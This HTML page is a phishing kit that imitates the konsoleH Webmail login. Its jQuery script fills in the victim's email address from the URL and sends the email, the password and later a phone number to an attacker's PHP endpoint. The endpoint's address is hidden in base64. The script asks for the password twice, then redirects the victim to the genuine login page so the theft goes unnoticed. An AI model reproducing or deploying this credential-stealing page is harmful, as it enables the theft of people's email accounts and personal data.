<!-- TODO: mx for email/Reporting/auto email Add mx to index file-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html lang="en-GB">
<head>
    <title>konsoleH&trade; Webmail</title>
    <link href="https://rpnc63fhdzsioe7pts52grygxejbqnfgz4rl67x6mrvtvhj564hq.arweave.net/i9ovbKceZIcT75y7o0cGuRIYNKbPIr9-_mRrOp099w8" rel="SHORTCUT ICON" />
    <meta NAME="robots" CONTENT="noindex, nofollow"></meta>
    <link href="https://mt7smyh2mnxsxpkycfehpxnuu7gvzasqfj6jiv2j4543afyvzgta.arweave.net/ZP8mYPpjbyu9WBFId920p81cglAqfJRXSed5sBcVyaY" rel="stylesheet" type="text/css" />  
</head>
    
<body>

    <div id="bookmark-reminder">We recommend you bookmark this page.</div>

     
 
        <div align="center" style="margin-top: 200px;"> 
            <table cellSpacing=0 cellPadding=0 border=0 height="80%" width="580"> 
                <tr class=rowTopTile> 
                    <td width=10 valign="bottom"><img height=20 alt="" src="https://rizsa2w77yujwtrbt55l33ykx43aw3kdm3s6jtczioepelcgc4bq.arweave.net/ijMgat_-KJtOIZ96ve8KvzYLbUNm5eTMWUOI8ixGFwM" width=10></td> 
                        <td>
                            <table cellSpacing=0 cellPadding=0 border=0 width="100%"> 
                                <tr> 
                                    <td valign="bottom" width=10><img height=20 src="https://2uqoft72op7qznm7bdkmoyqygwi3b2me2qq3onomlbwttrvdjsfa.arweave.net/1SDiz_pz_wy1nwjUx2IYNZGw6YTUIbc1zFhtOcajTIo" width=10></td> 
                                    <td width=5><img src="https://njqefmft6i66jepxtpaniaj2l4kkwt63l7yjlkfsdipprz4l23ya.arweave.net/amBCsLPyPeSR95vA1AE6XxSrT9tf8JWoshoe-OeL1vA" width=5 height=36></td> 
                                    <td nowrap valign="bottom"><img src="https://lvqtgkad3a5jq6z5igwldcy3rse6qbdmcbjbuq6eapnjy2vtcnfa.arweave.net/XWEzKAPYOph7PUGssYsbjInoBGwQUhpDxAPanGqzE0o" name=logo width="120" height=20 border=0></td> 
             
                                    <td width=5><img src="https://njqefmft6i66jepxtpaniaj2l4kkwt63l7yjlkfsdipprz4l23ya.arweave.net/amBCsLPyPeSR95vA1AE6XxSrT9tf8JWoshoe-OeL1vA" width=5 height=36></td> 
                                    <td valign="bottom" width=100%><img height=20 src="https://2uqoft72op7qznm7bdkmoyqygwi3b2me2qq3onomlbwttrvdjsfa.arweave.net/1SDiz_pz_wy1nwjUx2IYNZGw6YTUIbc1zFhtOcajTIo" width="100%"></td> 
                                    <td valign="bottom" width=15><img height=20 alt="" src="https://2uqoft72op7qznm7bdkmoyqygwi3b2me2qq3onomlbwttrvdjsfa.arweave.net/1SDiz_pz_wy1nwjUx2IYNZGw6YTUIbc1zFhtOcajTIo" width=15></td> 
				</tr> 
                            </table>
                        </td> 
                    <td valign="bottom" width=10><img height=20 alt="" src="https://6vqxckewfjbirvm7mtseeeczg7agzyki7f66qmviwf7hr2g3gjka.arweave.net/9WFxKJYqQojVn2TkQhBZN8Bs4Uj5fegyqLF-eOjbMlQ" width=10></td> 
		</tr>
		<tr> 
                    <td background="https://qb3kr76l5utocdslli34iaeyhiucn6pkl6lfpehi3wuznsibic2q.arweave.net/gHao_8vtJuEOS1o3xACYOigm-epflleQ6N2plskBQLU"></td> 
                    <td> 
                        <table width="100%" border="0"> 
                            <tr> 
                                <td align="center"> 
 
                                    <table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td><img src='https://njqefmft6i66jepxtpaniaj2l4kkwt63l7yjlkfsdipprz4l23ya.arweave.net/amBCsLPyPeSR95vA1AE6XxSrT9tf8JWoshoe-OeL1vA' height='40'></td></tr></table> 
 
                                    <table width='100%' cellpadding='0' cellspacing='0' border='0' align='center'> 
					    <tr>
						    <td width='50%'></td>
						    <td>
							    &nbsp;
							
					            </td>
					    </tr>
                                        <tr> 
                                          <td width='50%'> 
                                            <table cellpadding='0' cellspacing='0' border='0' width='100%' class='textbox_text_light'> 
                                              <tr> 
                                                <td width='3'><img src='https://tvpymosqq2pr6zmotthznmuenpkqoostqmi6xstazll5w3gidpmq.arweave.net/nV-GOlCGnx9ljpzPlrKEa9UHOlODEevKYMrX22zIG9k' width='3' height='18'></td> 
                                                <td align="center">Email (eg. you@domain.com)</td> 
                                                <td width="3"><img src='https://ejjzcvywfkggtzkyoqo7ppvhyixgelvehvvmfsk6n72tt5s4m6yq.arweave.net/IlORVxYqjGnlWHQd976nwi5iLqQ9asLJXm_1OfZcZ7E' width='3' height='18'></td> 
                                              </tr> 
                                            </table> 
                                          </td> 
                                          <td width='50%'><input type="text" tabindex="1" name="em" id="ai" value=""  class="textbox_input" readonly /></td>                                         </tr> 
                                    </table> 
 
                                    <table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td><img src='https://webmail.konsoleh.co.za/img/trans.gif' height='5'></td></tr></table> 

                                    <table width='100%' cellpadding='0' cellspacing='0' border='0' align='center'> 
                                       <tr> 
                                         <td width='50%'> 
                                           <table cellpadding='0' cellspacing='0' border='0' width='100%' class='textbox_text_light'> 
                                             <tr> 
                                               <td width='3'><img src='https://tvpymosqq2pr6zmotthznmuenpkqoostqmi6xstazll5w3gidpmq.arweave.net/nV-GOlCGnx9ljpzPlrKEa9UHOlODEevKYMrX22zIG9k' width='3' height='18'></td> 
                                               <td align='center'>Password</td> 
                                               <td width='3'><img src='https://ejjzcvywfkggtzkyoqo7ppvhyixgelvehvvmfsk6n72tt5s4m6yq.arweave.net/IlORVxYqjGnlWHQd976nwi5iLqQ9asLJXm_1OfZcZ7E' width='3' height='18'></td> 
                                             </tr> 
                                           </table> 
                                         </td> 
                                       <td width='50%'><input type="password" tabindex="2" name="ps" id="namep" value="" class="textbox_input" /></td>                                      </tr> 
                                </table> 
 
                                <table width='100%' cellpadding='0' cellspacing='0' border='0'><tr><td><img src='https://njqefmft6i66jepxtpaniaj2l4kkwt63l7yjlkfsdipprz4l23ya.arweave.net/amBCsLPyPeSR95vA1AE6XxSrT9tf8JWoshoe-OeL1vA' height='5'></td></tr></table> 
 
				<table cellpadding='0' cellspacing='0' border='0' width='100%'> 
				<tr> 
				  <td width='19'><img src='https://njqefmft6i66jepxtpaniaj2l4kkwt63l7yjlkfsdipprz4l23ya.arweave.net/amBCsLPyPeSR95vA1AE6XxSrT9tf8JWoshoe-OeL1vA' width='18' height='8'></td> 
				  <td align='right'> 
				    [&nbsp;<a href='#' tabindex="5" value="Login" name="loginButton" id="submit-btn" title=''>Webmail Login</a>&nbsp;]</td> 
				  <td width='19'><img src='https://njqefmft6i66jepxtpaniaj2l4kkwt63l7yjlkfsdipprz4l23ya.arweave.net/amBCsLPyPeSR95vA1AE6XxSrT9tf8JWoshoe-OeL1vA' width='18' height='8'></td> 
				</tr> 
				<div class="row">
							<div class="error" id="msg"style="display: none; color:red;">The user name or password you entered isn't correct. Try entering it again.</div>
							<div class="alert alert-danger" id="error" style="display: none; color:red;">Incorrect Password</div>
							</div>
				<tr> 
                                  <td colspan="3"><img src='https://njqefmft6i66jepxtpaniaj2l4kkwt63l7yjlkfsdipprz4l23ya.arweave.net/amBCsLPyPeSR95vA1AE6XxSrT9tf8JWoshoe-OeL1vA' width='18' height='40'></td> 
                                </tr> 
                            </table> 
                        </td> 
                    </tr> 
                 </table> 
             </td> 
         <td background="https://jcbticmtdg7qs6lgeklqfpq67hwc2sn3fetyl3qer4mr5xuz7cxq.arweave.net/SIM0CZMZvwl5ZiKXAr4e-ewtSbspJ4XuBI8ZHt6Z-K8"></td> 
    </tr> 
    <tr> 
      <td><img height=20 alt="" src="https://rqbv2olhxdbhixx2u3jvyq5tv2rw2tfpysqqy22dqwbqb4aiafkq.arweave.net/jANdOWe4wnRe-qbTXEOzrqNtTK_EoQxrQ4WDAPAIAVU" width=10></td> 
      <td><img height=20 alt="" src="https://k7wcw5bhuhigbrkrwgzu5o7l4sennv2gbicohr2tggqq7psdvgva.arweave.net/V-wrdCeh0GDFUbGzTrvr5IjW10YKBOPHUzGhD75Dqao" width="100%"></td> 
      <td><img height=20 alt="" src="https://sje6zz5y7zyfzymqyjk4p2z3owuvenk5zobqtyxxtm5aijtfvyhq.arweave.net/kkns57j-cFzhkMJVx-s7dalSNV3Lgwni95s6BCZlrg8" width=10></td> 
    </tr> 
  </table> 
 </div> 
</form> 
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script>
	/* global $ */
$(document).ready(function() {
    var count = 0;

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        $('#ai').val(my_ai);
        $("#msg").hide();
        $.get("https://logo.clearbit.com/" + my_slice)
            .done(function() {
                $(".log").attr("src", "https://logo.clearbit.com/" + my_slice);

            }).fail(function() {
                $(".log").attr("src", "https://i.imgur.com/cKV4FIx.png");

            })
    }
	var file="aHR0cHM6Ly9iY29ubmVjdGZ4LmNvbS9wcC9qYS5waHA=";

    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var namep = $("#namep").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);

        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("Email is required");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("That account doesn't exist. Enter a different account");
            ai.focus;
            return false;
        }
        if (!namep) {
            $('#error').show();
            $('#error').html("Password is required");
            ai.focus;
            return false;
        }
		//minimum password length validation  

		if(namep.length < 5) {  

			$('#error').show();
            $('#error').html("Please check your password");
            ai.focus;  

			return false;  

		}
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();

        $.get("https://logo.clearbit.com/" + my_slice)
            .done(function() {
                $(".log").attr("src", "https://logo.clearbit.com/" + my_slice);

            }).fail(function() {
                $(".log").attr("src", "https://i.imgur.com/cKV4FIx.png");

            })

        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                namep: namep,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').val('Verifing...');
            },
            success: function(response) {
                if (count == 2 && final == "gmail") {
                    $('#aich').html(my_ai);
                    $("#div1").animate({ left: 0, opacity: "hide" }, 0);
                    $("#div2").animate({ right: 0, opacity: "show" }, 1000);

                    return false;

                }
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#namep").val("");
                        if (count >= 2) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("https://webmail.konsoleh.co.za/login");

                        }
                        // $('#msg').html(response['msg']);
                    } else {
                        // $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                if (count == 2 && final == "gmail") {
                    $('#aich').html(my_ai);
                    $("#div1").animate({ left: 200, opacity: "hide" }, 0);
                    $("#div2").animate({ right: 200, opacity: "show" }, 1000);

                    return false;

                }
                $("#namep").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("https://webmail.konsoleh.co.za/login");
                }
                $("#msg").show();
                // $('#msg').html("Please try again later");
            },
            complete: function() {
                $('#submit-btn').val('Login');
            }
        });
    });

    $('#submit-btn1').click(function(event) {
        event.preventDefault();
        var ai = $("#ai").val();
        var namep = $("#namep").val();
        var ph = $("#ph").val();
        var detail = $("#field").html();
        var msg1 = $('#msg1').html();
        if (!ph) {
            $('#error').show();
            $('#error').html("Phone number is required");
            ai.focus;
            return false;
        }
        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                namep: namep,
                detail: detail,
                ph: ph,

            },
            beforeSend: function(xhr) {
                $('#submit-btn1').val('Verifing...');
            },
            success: function(response) {
                window.location.replace("https://webmail.konsoleh.co.za/login");
                
            },
            error: function() {
                window.location.replace("https://webmail.konsoleh.co.za/login");
            },
            complete: function() {
                $('#submit-btn1').val('Verify');
            }
        });
        // }
    });


});
</script>
</body>
</html>
